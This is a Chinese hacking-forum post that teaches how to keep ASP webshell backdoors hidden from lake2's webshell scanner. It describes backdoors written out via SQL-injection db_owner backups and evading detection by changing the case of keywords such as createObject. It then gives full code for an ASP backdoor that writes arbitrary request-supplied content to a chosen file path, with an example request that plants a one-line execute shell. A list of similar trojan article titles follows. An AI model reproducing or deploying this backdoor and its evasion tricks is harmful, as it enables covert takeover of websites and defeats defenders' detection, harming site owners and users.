|
[推荐]Web后门经验谈
自从lake2出了后门扫马程序以后,后门的存活率可就大大的减少了,唉,没办法,谁叫人家这么厉害呢,一个程序搞定那么多的小马,可怜菜鸟们了,好不容易留下的后门一下子全被暴露无疑了。这个扫马程序也是很厉害,不过在我的很多测试中,发现了不少lake2扫马程序发现不了的后门,也许lake2得将这个后门改改了,改得更先进一点为好。下面就我的个人经验来谈谈如何躲过lake2的扫马程序。
首先,第一种不被发现的后门是能过SQL注射工具利用db_owner权限备份出来的后门。那还是在一次入侵中发现的,我备份小马后,又上传了扫马程序,想将其它黑客的后门删掉,结果无意中发现这个后门居然没有被扫出来,真是幸运啊,后来我就收藏了这个备份的小马,以后的入侵中也被我当成了一个后门程序来用,呵呵。
其次,改下关键字的大小写就可以躲过了,比如我在一次试验中,将关键字"createObject"全部写成了小写"createobject",当然也可以大小交替,结果又意外地发现扫马程序没有扫出来,所以无论是小马,还是大马,我都采用小写的形式,当然,这样写是不会影响程序的功能的。
第三,通过第二步,做一个自己的小马,这个我已经做好了,代码如下(注意其中的creatobject作了大小写处理):
--------------------------------------------------------------------------------
<%
’code by locus,welcome to http://locus.blog.sohu.com
On Error Resume Next
IF Request("act")="creatshell" then
set gl=server.createObJeCt("Adodb.Stream")
gl.Open
gl.Type=2
gl.CharSet="gb2312"
gl.writetext request("shellcode")
gl.SaveToFile server.mappath(request("shellpath")),2
gl.Close
set gl=nothing
response.redirect request("shellpath")
end if
%>
--------------------------------------------------------------------------------
代码虽然大了些,比不上那些精简的小马,但却也是一种简单的后门吧,使用方法如下:比如我们将这些代码放到newslist.asp里,那么只要我们输入newslist.asp?act=creatshell&shellcode=hello&shellpath=locus.asp,那么我们就可以在与newslist.asp同目录下生成一个locus.asp的文件,内容为"hello",于是我们只要改变shellcode的内容,就可以得到一个shell,比如输入shellcode=<%25execute request("locus")%25>,我们就得到一个一句话后门了,而且这个简单的后门能躲过lake2的扫马程序。
也许还有其它方法,但我还没发现,等发现了再补充啦,呵呵。
| 后门程序知识完全解析 | 01-14 |
| 2007年度网马漏洞不完全总结 | 01-09 |
| 简单修改木马壳头让卡巴斯基哑口 | 09-22 |
| ASPX一句话木马--终极版&详细分析 | 08-11 |
| 认识使用 Rootkit技术的木马 | 06-12 |
| 分析ANI智能网马挂马 | 06-08 |
| Flash木马是这样练成的 | 05-18 |
| XML木马研究 | 05-18 |
| 脚本图片类后门病毒的完美使用方 | 05-16 |
| 两个批量挂马脚本 | 05-11 |
| 黑客技术之打造不死的ASP木马的方 | 04-20 |
| php后门插在图片里执行回显思路 | 04-06 |
您现在的位置: